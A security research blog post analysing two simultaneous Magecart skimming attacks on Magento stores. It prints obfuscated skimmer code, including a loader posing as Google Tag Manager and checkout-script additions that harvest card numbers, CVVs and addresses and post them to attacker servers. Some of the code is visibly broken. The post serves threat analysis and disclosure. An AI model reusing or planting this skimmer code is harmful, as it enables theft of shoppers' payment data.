HUMAN Research Team Uncovers New Trend in Magecart Attacks: Multiple Magecart Groups Attacking Simultaneously


November 4, 2019

Categories: Magecart

HUMAN Research Team Uncovers New Trend in Magecart Attacks: Multiple Magecart Groups Attacking Simultaneously

Magecart attackers are tripping over each other for your users’ data.

The HUMAN research team has recently investigated multiple Magecart attacks and has observed an interesting new trend: multiple Magecart attacks are skimming credit cards from sites at the same time. Each observed attack used a different technique and simultaneous attacks did not appear to be coordinated. There is also a larger trend starting where Magecart attacks are becoming more organized, with attackers sharing tools and targeting sites using e-commerce platforms. In some cases the groups are running attack campaigns simultaneously without realizing in an effort to maximize reach while minimizing their level of effort.

Our research team began investigating the Magecart attack on Sixth June as soon as it was reported. When an attack is brought to our team’s attention, they delve deep into the kill chain to get insights on how the attack is evolving. As we dug deeper into the attack, we started to piece together the chain of skimmers, the hosting sites, other affected sites and the attack techniques. Additionally, we made an interesting discovery of simultaneous Magecart attacks on We have informed the website owners mentioned in this blog about their respective attacks prior to publishing this information.

In this blog, we will detail our findings on the Sixth June Magecart attack and show how we investigated the entire kill chain, leading to the discovery of the new trend of simultaneous skimming attacks on websites. The attack is an example of this trend of two attacks happening simultaneously.

The following attack chart shows the path that our research team took to discover this new trend. We started with Sixth June and found the skimming data being posted to the hostname which is also hosting the skimmer. Scanning the web for other sites posting data to, we found other sites infected by the same skimmer, including From the full analysis of, we found a second Magecart attacker injecting yet another skimmer and exfiltrating card data to, a site registered in Russia less than two months ago. The relatively short age of the domain is an indicator of its suspicious intent.


The two skimmers were completely different from each other in terms of code, obfuscation level and complexity. But, both attacks targeted Magento-based sites and used similar methods of code injection and served malicious first-party code to unsuspecting users. The Sixth June attacker directly compromised the websites with a decoy snippet that masqueraded as a Google Analytics script. The Sixth June attacker also used a much simpler loader on PexSuperstore when compared to the Sixth June attack. Here is simple snippet variant:

<script type="text/javascript" src=""></script>

The decoy script then pulled in an obfuscated snippet that loads the skimmer from a remote server controlled by the attacker. This direct site compromise is called a first-party attack. The second Magecart attacker also compromised the website, this time with no loader script planted. The attacker modified the first-party script related to the checkout process and added skimming code at the bottom of the original script.

Sixth June Magecart attack breakdown

On October 28th, Sixth June was mentioned as a new skimming victim on Twitter. The skimmer was implemented on the Magento-based website for over a week before Sixth June addressed it. As mentioned by the first researcher Jenkins, the malicious code did not trigger for non-US visitors or users running Linux operating systems.

Stage 1: Skimmers compromise the website

The website was compromised by the attacker to add a malicious inline javascript snippet to the website’s code. The exact mode of compromise could not be determined, but the attacker did modify pages served from Sixth June web servers.

Stage 2: Skimmers place a malicious inline script

An inline script was disguised as a legitimate Google Analytics tag in the source code of the website.

<!-- Google Tag Manager -->
<!-- End Google Tag Manager -->

Stage 3: Inline loader scripts loads the obfuscated skimmer script

The inline script loaded another script that was heavily obfuscated, from an external host hosted on a French ASN and registered in the Netherlands on October 4, 2019. Note the attempt to deceive by using a domain similar to Magento. This script is a loader script that decrypts and executes the embedded inner script.

(function() {
  var G0h = {};
  var Vnn = 0 * "x7fO:x89npRi=,hwb_6})F8"["charCodeAt"](17) + 1.0;
  Ag6 = "";
  var VYd = "kd:j4cPx88;*x87$H2x7f"["length"] * 0 + 1.0;
  var H1Y =
  xx = "".constructor;
  var J42 = 4.0 + "vx87gNkA3hEu|x88UzC"["length"] * 2;
  for (
    var Eqq = 0.0 + "x80D-vV8Ix8b?"["length"] * 0;
    Eqq < H1Y["l" + (88 > 29 ? "x65" : "x5e") + "" + "" + (62 > 23 ? "x6e" : "x67") + "gth"];
    Eqq += "^%Ir?|g)@d~>X,"["charCodeAt"](12) * 0 + 2.0
  ) {
    Ag6 =
      Ag6 +
      String["from" + (65 > 41 ? "x43" : "x39") + "ha" + "rCo" + (58 > 35 ? "x64" : "x5a") + "e"](
          H1Y["s" + (96 > 28 ? "x75" : "x70") + "bs" + "" + (95 > 22 ? "x74" : "x6c") + "r"](
            "A~V+YCtW0u@q{Kl?Ze2("["charCodeAt"](15) * 0 + 2.0
  VYd = "setTimeout(Ag6," + Vnn;
  VYd = VYd + ");";
  G0h["" + (98 > 24 ? "x74" : "x6b") + "oSt" + "r" + (74 > 23 ? "x69" : "x61") + "ng"] = xx[
    "con" + (85 > 5 ? "x73" : "x6a") + "truct" + "" + (87 > 5 ? "x6f" : "x67") + "r"
  s = G0h + ".";

Stage 4: Obfuscated skimmer script exfiltrates credit card

The malicious script that was imported from loaded an inner script, also heavily obfuscated. This script is the skimmer itself, which is placing ongoing event listeners and accesses all document object model (DOM) element values. The script also exists on checkout pages which contain highly sensitive personally identifiable information (PII) and payment details.

The final formjacking script of the skimmer:

var Y6x = "7Faq'{Cic6x7f4"["length"] * 41 + 8.0;
var laV = 2.0 + ")ORx80x8b"["length"] * 85;
jQuery(document)["" + (60 > 39 ? "x72" : "x6d") + "ead" + "y"](function() {
  $(document)["" + "" + (65 > 46 ? "x6f" : "x68") + "n"](
    "M2cqlxi3scOk"["replace"](/[qsM23xO]/g, ""),
    "9xbpsuit[HtWo4n"["replace"](/[[Wxi9sH4p]/g, ""),
    function() {
      var snd = null;
      var eRr = "]YR%qxWGFZN`taVyq`nIupls"[
        (2.0 + "QO?2qG&x82U#FD"["length"] * 2457308705)["toString"](
          0 * "x820v/njrx89mu)x85=x8af,("["charCodeAt"](16) + 32.0
      ](/[YtGlIpx]%`yVZ]/g, "");
      var inp = document["" + "queryS" + (95 > 40 ? "x65" : "x60") + "lectorAll"](
        "Ji)n+pA[u<tz,1 zs0e&l6e;`cEtYH,Q wMtvIeV1x7tIfa&rNeWZa6,q; Cc4Lh0e[c2kYb@o&x"["replace"](
      for (
        var i = 0 * "JW56ax8b;Am"["length"] + 0.0;
        i < inp["" + (61 > 27 ? "x6c" : "x65") + "e" + "ngt" + (57 > 34 ? "x68" : "x62") + ""];
      ) {
        if (
          inp[i]["" + (56 > 34 ? "x76" : "x6c") + "alu" + "e"]["l" + "eng" + (87 > 29 ? "x74" : "x6f") + "h"] >
            "x89X+x82Y_G0x866tx8b'"["length"] * 0 + 0.0 &&
          inp[i]["v" + "" + (62 > 37 ? "x61" : "x5b") + "lue"]["len" + (73 > 42 ? "x67" : "x61") + "t" + "h"] <
            4 * "rx84#n[<6LDvWf."["length"] + 8.0
        ) {
          var nme = inp[i]["i" + "d"];
          if (
            nme ==
              ("bacx88Ar'E#x80"["charCodeAt"](6) * 1529811105 + 23.0)["toString"](4.0 + "6p5lzXx88+"["length"] * 4)
            ]("zIoQzIsn3f", "")
          ) {
            nme = i;
            VuS = 0 * "<vMF|:AT%x81)x82x85D"["charCodeAt"](13) + 31.0;
          snd +=
            inp[i]["" + "" + (87 > 35 ? "x69" : "x5f") + "d"] +
            "Q="["replace"](/[Q]/g, "") +
            inp[i]["" + (99 > 27 ? "x76" : "x6e") + "alu" + "e"] +
              (1625808742 * "VSNWGd@?{J+mk(L"["length"] + 3.0)["toString"](
                0 * "x8a1%rLVCx80Ug#&R)"["charCodeAt"](8) + 31.0
            ](/[`]/g, "");
          iF5 = "B`K(LNkn7SP20Vi=aUsWowrf"[
            (",-V(@cZx60vxrY;:wpD'x80<"["charCodeAt"](17) * 756094986 + 8.0)["toString"](
              32.0 + "S|RZ#3VX{CzcDx7fmj"["charCodeAt"](7) * 0
          ](/[=0k`PNiUwB7rW(]/g, "");
      if (snd != null) {
        var regexp = /(3|4|5|6)[0-9]{13,16}/gi;
        ZHq = 8.0 + "jMa.vcbkhU>x89g)x60*173"["charCodeAt"](17) * 4;
        var re = snd["" + (86 > 6 ? "x72" : "x6c") + "e" + "plac" + (54 > 48 ? "x65" : "x5c") + ""](
          / /g,
            ("a>%<Yx60_}cx89&8d"["charCodeAt"](3) * 840115113 + 29.0)["toString"](
              35.0 + "I)+=x81[Yx83kmnC/j"["charCodeAt"](3) * 0
          ]("kZeHOlnoc8", "")
        i2y = "uK_KFzXMLO@RObvak6AYdI"[
          ("ys+)xGEYmLK"["charCodeAt"](3) * 1229436751 + 18.0)["toString"](5.0 + "i%xhW#o,.IV5x81x89w"["length"] * 2)
        ](/[RXabA6FLu@d_]/g, "");
        re = re["rep" + (59 > 27 ? "x6c" : "x65") + "a" + "" + (69 > 24 ? "x63" : "x5d") + "e"](
          ""[(2.0 + "=%7qd"["length"] * 5897540892)["toString"](0.0 + "mRZ1twXK"["length"] * 4)]("REyxe9pHTw", "")
        nsS = "FtiANYFn8pvRSNmRd5r<6"["replace"](/[5p<iF8NR]/g, "");
        K96 = "GNbtHcqAWoZah4SmDZtk~j"["replace"](/[~AcS4NGDato]/g, "");
        var matches = re["" + "mat" + (99 > 12 ? "x63" : "x5c") + "h"](regexp);
        X3v = "lAdQUr9NKZMVW]7Xoh6TnG8U"[
          ("/RqciSx83hMx80x7f>|WwH"["charCodeAt"](13) * 685777392 + 14.0)["toString"](
            "c=.h6U>e@(JCSdz"["charCodeAt"](8) * 0 + 36.0
        ](/[N6]AMVrXolQ8nK]/g, "");
        if (matches != null) {
          if (qTw(matches["x88x7fQIAyo{=mX"["length"] * 0 + 0.0]) == true) {
            snd = L1l(
              snd +
                "8w&m(sehro8pG="["replace"](/[wGm(er8]/g, "") +
                window["loca" + (92 > 6 ? "x74" : "x6f") + "" + "io" + (61 > 33 ? "x6e" : "x67") + ""][
                  "" + (95 > 0 ? "x68" : "x62") + "os" + "t"
                ] +
                "MT&McvaoIr)d6_U1W2-93yz="["replace"](/[ovWT-9)MzyUI6]/g, "") +
                matches[0.0 + "]px87x86eavHO>Ls-K"["charCodeAt"](13) * 0]
            A7Z = "pA%9zkF2uWeV%JYG3`N>6v8"["replace"](/[`>peFWGv%Yz2]/g, "");
            var NmK = "vFdgd&Vs;n`2+m)ZiNFB!b"["replace"](/[;i+&F)!Vg`v]/g, "");
            var gOB = "li(rk4QyF9>L8vi=0u)eo3"[
              ("/&63uz*0Q("["charCodeAt"](9) * 886198616 + 27.0)["toString"](
                "7*T?x882YHdE>Ox84,^;6"["charCodeAt"](5) * 0 + 33.0
            ](/[F()=vLluQ>ko]/g, "");
            var Vo2 = "9zwr#lwA*7@TVWvs6<ifUC"[
              (47.0 + "(:x82D_BJ87KryM^"["charCodeAt"](8) * 644508084)["toString"](
                33.0 + "]C(:T*^@,[}Ygps?"["charCodeAt"](11) * 0
            ](/[<s*f#@WVwU9]/g, "");
            tI1 = "1#RG2(y~gt4Y72#3x8fz/s"[
              ("8x81x83N7'~X1_"["charCodeAt"](4) * 443402384 + 13.0)["toString"](
                9.0 + "x7ftq5}mJx87oMZ"["length"] * 2
            ](/[~x(/tf1GY7#]/g, "");
            NMU = "DzpnEkZPqA0pRTb9T=K5l]z"["replace"](/[9ERDP]AbZ5=p]/g, "");
            TT4 = 18.0 + "qx80p=Nv[x82%Macx7f>x8b"["charCodeAt"](9) * 2;
            var D9Q = 24.0 + "/x8ajDi<s_ux890.AQ"["charCodeAt"](13) * 0;
            var key = L1l(
              window["" + "loca" + (55 > 3 ? "x74" : "x6c") + "ion"][
                "h" + (79 > 40 ? "x6f" : "x65") + "" + "" + (65 > 12 ? "x73" : "x6d") + "t"
            qaD = "2L-;b1xesLDGJ!H3P9NrOZBS"["replace"](/[1Z9rB2!sDJ-e3;]/g, "");
            var data =
              "W`phwn7+gu="["replace"](/[+wWuh`7]/g, "") + snd + "C&cPkMe>ly~="["replace"](/[M>c~PCl]/g, "") + key;
            var Kqv = 2.0 + "Cx86$pZ"["length"] * 95;
            urll = "Q1h5tZt*pF)sL:;/2J/QKw4KwQw4.[m5o*g!eIn)t[oD.OiJHnEf8`o=/(>i4JmF#aNgJ~e%sS/(v2iXs4aH8-`~m]a+sKtTKe@r>cbZa1r!dZX-uaUm5e2xC_903.VpOnTg"[
            ](/[1Q2H!5+%>#)b~TN;K=V[u]9IE(UCFSODJ@348*LX`Z]/g, "");
            jri = "CMwi0S8gBFnr>Xzd`xKCI2ql"["replace"](/[Cz2KS0Fwgr`>q]/g, "");
            jQuery["a" + (94 > 37 ? "x6a" : "x61") + "" + "a" + (63 > 31 ? "x78" : "x73") + ""]({
              type: "pPUaOESiT"["replace"](/[iUpaE]/g, ""),
              url: urll,
              data: data,
vwj = "#-O25Vo0%qy"["charCodeAt"](4) * 3 + 47.0;
function qTw(s) {
  var v = "e0s1L2;3A4k<5/6D7]8y*9"[
    (1625808742 * "3I9gZ.x821_(x81j5ix80"["length"] + 3.0)["toString"](
      0 * "hv~7c=p>Rx89[Q"["charCodeAt"](10) + 31.0
  ](/[A<*/k;LDy]es]/g, "");
  u1J = "O2S;UcWnoEFCxnGZ~eP%(L3D"[
    ("[5Bx88/x8bfE6"["length"] * 5600767423 + 2.0)["toString"](
      "BJxx8bZ)aNDi8ux89l'x60r_*"["charCodeAt"](10) * 0 + 35.0
  ](/[SEGnOC;~e3%c(]/g, "");
  var w = ""[
    ("qx8bX/o-,"["length"] * 3483875876 + 1.0)["toString"](31.0 + "xux81XPGk7x82x88_vW"["charCodeAt"](5) * 0)
  ]("o97zIjFxdS", "");
  for (
    i = 0 * "w'nK%>:MHb1*o"["charCodeAt"](4) + 0.0;
    i < s["" + (86 > 14 ? "x6c" : "x62") + "eng" + "" + (100 > 9 ? "x74" : "x6d") + "h"];
  ) {
    x = s["c" + "" + (57 > 3 ? "x68" : "x60") + "arAt"](i);
    if (
      v["i" + "nde" + (91 > 40 ? "x78" : "x72") + "Of"](x, ":cR^qy|4;wex83U@HM0"["charCodeAt"](12) * 0 + 0.0) !=
      -(1.0 + "4IPgY"["length"] * 0)
      w += x;
    NYA = "{T$zx60C,/x802"["length"] * 45 + 4.0;
  j = w["" + "lengt" + (88 > 4 ? "x68" : "x5e") + ""] / (2.0 + "e^;],Ox89u}s|I_-8%lx84X"["charCodeAt"](18) * 0);
  var dgD = 22.0 + "b*x80nM(@g+}x60CG"["charCodeAt"](5) * 7;
  k = Math["f" + "loo" + (86 > 32 ? "x72" : "x6c") + ""](j);
  LFe = "=s8507Gl(V~m2YXBJqfTN++V"[
    (274012709 * "gUx60iYxO;9y#Zx84zx89hSE"["charCodeAt"](4) + 32.0)["toString"]("Hqx83Rjbe%"["length"] * 3 + 7.0)
  ](/[7G~8Tq=(m+B5Y]/g, "");
  m = Math["ce" + (65 > 7 ? "x69" : "x63") + "" + "l"](j) - k;
  B3t = "i4JwbuOWwR+lxFNTQUXPHSZx1"[
    ("7-5wGf%V^x88|jk}"["charCodeAt"](2) * 460134549 + 36.0)["toString"](
      31.0 + "|R6x88gx87ZlhV9PIx8aB})y"["charCodeAt"](14) * 0
  ](/[+FHxSuUOwX4iT]/g, "");
  c = "7UG{jIZcE8Kh-/x89"["charCodeAt"](13) * 0 + 0.0;
  for (i = 0.0 + "B7x80?k["["length"] * 0; i < k; i++) {
    a =
      w["" + (92 > 11 ? "x63" : "x5e") + "h" + "a" + (60 > 17 ? "x72" : "x6c") + "At"](
        i * ("PW~(a@Dn.'#i5"["length"] * 0 + 2.0) + m
      ) *
      (0 * ",)BJ4x88Yx8a*vnc"["length"] + 2.0);
    c +=
      a > "x60wqH83sQj?x87tuz2x856x%"["charCodeAt"](7) * 0 + 9.0
        ? Math["" + "floo" + (71 > 0 ? "x72" : "x68") + ""](
            a / (0 * "#yqJ9:4hu%x82x60p$x8b"["length"] + 10.0) +
              (a % (10.0 + "x7fQs=kY~tO&{x82"["charCodeAt"](5) * 0))
        : a;
  for (i = "S3x60hv|>n:]t"["length"] * 0 + 0.0; i < k + m; i++)
    c +=
      w["cha" + (100 > 48 ? "x72" : "x68") + "" + "" + (100 > 15 ? "x41" : "x3a") + "t"](
        i * ("}?5Um-x82DlC=&."["length"] * 0 + 2.0) + 1 - m
      ) *
      (0 * "R$x85n_co+%^qPx60-"["length"] + 1.0);
  return c % ("a]5V0Hvx85x80I=O-x84"["length"] * 0 + 10.0) == 0 * "&|wIgx60B0~"["length"] + 0.0;
  iw7 = "(Yow2nhGDZ#u]X_Cj~wKG"[
    ("x81~r#}tk<,sN"["length"] * 2217011921 + 2.0)["toString"]("pGwlU$(fsPR2nx80:KgOL"["charCodeAt"](18) * 0 + 31.0)
  ](/[~D]#(o_Kh2C]/g, "");
function L1l(theText) {
  output = new String();
  Niv = "?jyprx60h-x841x}fSi_x89"["charCodeAt"](13) * 3 + 31.0;
  Mdh = "o5!P>eVi5g1d9)QB7#kw~u"["replace"](/[we!)B~i>#dgo]/g, "");
  Temp = new Array();
  var bdG = "gPEh2-coLvl)]WyD*/3`ip#r"[
    (54.0 + "nTh-Bx82H+EJ"["charCodeAt"](9) * 398482492)["toString"](2 * "_x8b'iORH>zX6"["length"] + 10.0)
  ](/[)`/gvh]#y-*oiP]/g, "");
  Temp2 = new Array();
  nvC = "6J;y4~"["length"] * 21 + 4.0;
  TextSize = theText["" + "lengt" + (68 > 23 ? "x68" : "x5e") + ""];
  for (i = 0.0 + "&,*x80fs"["length"] * 0; i < TextSize; i++) {
    rnd =
      Math["r" + (70 > 31 ? "x6f" : "x69") + "" + "" + (83 > 19 ? "x75" : "x6c") + "nd"](
        Math["" + (89 > 28 ? "x72" : "x68") + "ando" + "m"]() * (24 * "@Ietl"["length"] + 2.0)
      ) +
      ("6x81HB->[k@x/.n}ey"["charCodeAt"](8) * 1 + 4.0);
    Temp[i] = theText["cha" + (75 > 28 ? "x72" : "x6c") + "" + "Co" + (66 > 19 ? "x64" : "x5d") + "eAt"](i) + rnd;
    var y$j = "c04Hx-t;jNlin+g>5VLi&OUf"[
      ("x82i?x87x60Z}w=61x85X"["charCodeAt"](8) * 978075952 + 46.0)["toString"](
        8.0 + "Rx88p{lLB%x85K'x86x5"["length"] * 2
    ](/[0;L-UV>+jl&Hnc]/g, "");
    nxo = "RlPM`sZLCzie`7ObK&3aBrk"["replace"](/[ROrzP&La`sKe]/g, "");
    gbS = "Jx7fe|O0YC:Fx81L'6o]B^?"["charCodeAt"](16) * 1 + 46.0;
    Temp2[i] = rnd;
  for (i = 0.0 + "Db#x86FU>Hg;R@"["charCodeAt"](11) * 0; i < TextSize; i++) {
    output += String["from" + (77 > 16 ? "x43" : "x3a") + "har" + "Cod" + (67 > 37 ? "x65" : "x5f") + ""](
  return output;
  cvA = "AL9)cipiSQ)a<2PB6XUg/AO"[
    ("x8b,_TrC"["length"] * 4064521855 + 3.0)["toString"](31.0 + "Okt%}QHAEUg's+"["charCodeAt"](13) * 0)
  ](/[/A6LPiQ)U<]/g, "");
CiZ = 5.0 + "l8Om;J}ID"["length"] * 47;

We also found the same exact skimmer on five other Magento-based sites including Similar skimmer loader scripts were found on 91 Magento-based sites.

Multiple Simultaneous Magecart attacks: Second Skimmer on

While examining, we noticed another suspicious post request being sent to a completely different domain:, registered in Russia. This skimmer was on the checkout page sniffing users’ PII data and sending post requests to When placing an order, the compromised first-party checkout script is called and executes the skimmer. related attack breakdown

Stage 1: Website compromise

The PerimeterX research team found that the skimmer script is placed on the web server owned by the company. While we don’t know the exact method used to compromise the web server, we can only surmise that the web server security controls were bypassed to make changes to the website.

Stage 2: Placing the skimmer script

Unlike the attack on Sixth June, the is no loader script. The checkout script was modified to execute on every checkout as shown below. The first 960 rows of the Magento checkout script are harmless code.

 * Magento
 * This source file is subject to the Academic Free License (AFL 3.0)
 * that is bundled with this package in the file LICENSE_AFL.txt.
 * It is also available through the world-wide-web at this URL:
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to so we can send you a copy immediately.
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to for more information.
 * @category    design
 * @package     base_default
 * @copyright   Copyright (c) 2006-2014 X.commerce, Inc. (
 * @license  Academic Free License (AFL 3.0)
var Checkout = Class.create();
Checkout.prototype = {
    initialize: function(accordion, urls){
        this.accordion = accordion;
        this.progressUrl = urls.progress;
        this.reviewUrl =;
        this.saveMethodUrl = urls.saveMethod;
        this.failureUrl = urls.failure;
        this.billingForm = false;
        this.shippingForm= false;
        this.syncBillingShipping = false;
        this.method = '';
        this.payment = '';
        this.loadWaiting = false;
        this.steps = ['login', 'billing', 'shipping', 'shipping_method', 'payment', 'review'];
        //We use billing as beginning step since progress bar tracks from billing
        this.currentStep = 'billing';

        this.accordion.sections.each(function(section) {
            Event.observe($(section).down('.step-title'), 'click', this._onSectionClick.bindAsEventListener(this));

        this.accordion.disallowAccessToNextSections = true;

     * Section header click handler
     * @param event
    _onSectionClick: function(event) {
        var section = $(Event.element(event).up().up());
        if (section.hasClassName('allow')) {
            this.gotoSection(section.readAttribute('id').replace('opc-', ''), false);
            return false;

    ajaxFailure: function(){
        location.href = this.failureUrl;

    reloadProgressBlock: function(toStep) {
        if (this.syncBillingShipping) {
            this.syncBillingShipping = false;

Below is part of the skimmer code added at the bottom of the original script:

var _$_a5d5=(function(i,k)
	var f=i.length;
	var n=[];
	for(var m=0;m< f;m++)
		n[m]= i.charAt(m)
	for(var m=0;m< f;m++)
		var q=k* (m+ 105)+ (k% 41322);
		var p=k* (m+ 218)+ (k% 52726);
		var o=q% f;
		var g=p% f;
		var a=n[o];
		n[o]= n[g];n[g]= a;k= (q+ p)% 1694965
	var d=String.fromCharCode(127);
	var j='';
	var c='x25';
	var h='x23x31';
	var e='x25';
	var b='x23x30';
	var l='x23';
	return n.join(j).split(c).join(d).split(h).join(e).split(b).join(l).split(d)
)("rQinuNemb%ica_pCmrimtnstAtc_%usbelncbteniacaxey#lolh%otlchot0euxlan%1itneckraiCNamdtD8gs/h-rafun%ttec#nnot0oczlc0ceCmsci%ln#kaR-i%eUh:%Ycsicdn:rcnfehke\%c0e d\cvoCme1%siiyten_elntagnoelosiasf%%uh.strsobkl%eSbma#cs#heatttmncmeCrt%hianoha_oei7t0tollr*sbeadtus4tlCoO_da%Abirp%adn_:Ce%%unTH\Pciiln\jiftsrie/12oiatbhl|crgnhg0@+fCe%o%ii%%Et%i%aai%h0zr_r#\_e7nirtp:urs%eatp0#%oxgdioga:todpN%|%%hmottc\ltelWn:8s%m#o:ibcd%gh:ti%yc#Kb%:eiega:d%ai%nikpNsg\selro00bccM2%___noeeghellrna\pposrc#l%nBrhe%siGc3:=_\bMPhfsel#i0aalYset^%%lSsTyze/iveclS%ru2to\%/exNnsg#2ye0%%stermacL%Vocl_0lev#tim%oAl%_6eFlm%Jneo%Oigro/#:tXgZdbutelgaejitanfpnri+uve%zzguiif5ec89n/|ew20lahi#pNeng0nd8cno%a#eealaonr%%kjyi%t%0eiighIitdnx0ac%_N#Cktettrp4e1cqc%deuOieun",975551);
	document[_$_a5d5[0]]= _$_a5d5[1];document[_$_a5d5[2]]= _$_a5d5[3];document[_$_a5d5[4]]= _$_a5d5[5];document[_$_a5d5[6]]= _$_a5d5[7];document[_$_a5d5[8]]= _$_a5d5[9];document[_$_a5d5[10]]= _$_a5d5[11];a();if(( new RegExp(_$_a5d5[14]))[_$_a5d5[13]](window[_$_a5d5[12]]))
	function c()
			if(jQuery(document[_$_a5d5[10]])[_$_a5d5[15]](document[_$_a5d5[8]])== false)


	function a()

	function e()
		var a;//40
		a= {Address:jQuery(_$_a5d5[19])[_$_a5d5[18]]()+ _$_a5d5[20]+ jQuery(_$_a5d5[21])[_$_a5d5[18]](),CCname:jQuery(_$_a5d5[22])[_$_a5d5[18]]()+ _$_a5d5[20]+ jQuery(_$_a5d5[23])[_$_a5d5[18]](),Email:jQuery(_$_a5d5[24])[_$_a5d5[18]](),Phone:jQuery(_$_a5d5[25])[_$_a5d5[18]](),Sity:jQuery(_$_a5d5[26])[_$_a5d5[18]](),State:jQuery(_$_a5d5[27])[_$_a5d5[18]](),Country:jQuery(_$_a5d5[28])[_$_a5d5[18]](),Zip:jQuery(_$_a5d5[29])[_$_a5d5[18]](),Shop:window[_$_a5d5[12]][_$_a5d5[30]],CcNumber:jQuery(document[_$_a5d5[0]])[_$_a5d5[18]](),ExpDate:jQuery(document[_$_a5d5[2]])[_$_a5d5[18]]()+ _$_a5d5[31]+ jQuery(document[_$_a5d5[4]])[_$_a5d5[18]](),Cvv:jQuery(document[_$_a5d5[6]])[_$_a5d5[18]]()};var b=JSON[_$_a5d5[32]](a);//59
		encData= d(b);jQuery[_$_a5d5[36]]({url:_$_a5d5[33],data:{main:encData},type:_$_a5d5[34],dataType:_$_a5d5[35],success:function(a)
			return false
			return false

Stage 3: Script exfiltrates credit card information

When placing an order, the compromised first-party checkout script is called and executes the skimmer. The malicious post request was traced back to a first-party script that was modified by the attacker, who added the skimming code at the bottom of the script.

stage 3 pt 1

stage 3 pt 2

It was interesting to find out that is related to a much larger campaign primarily targeting UmbroBrasil, a Brazilian website that was recently breached for the 2nd time, and other lesser-known websites.

It is also worth mentioning that hosts skimmers in addition to operating as an exfiltration gateway. Here are some of the skimmers it hosts:


Skimmers hosted on appear to be named after the intended target websites. We did not find any traces of active infection on upscalestripper and galeriedebeaute, but it is safe to assume that the attackers are preparing for a future campaign.


This revelation of multiple simultaneous Magecart attacks show that digital skimming is rapidly becoming a major threat to global e-commerce businesses. To restore user confidence, website owners should make sure to monitor and track the behavior of first and third-party code on their sites in real time to ensure bad actors do not bypass their infrastructure.

Spread the Word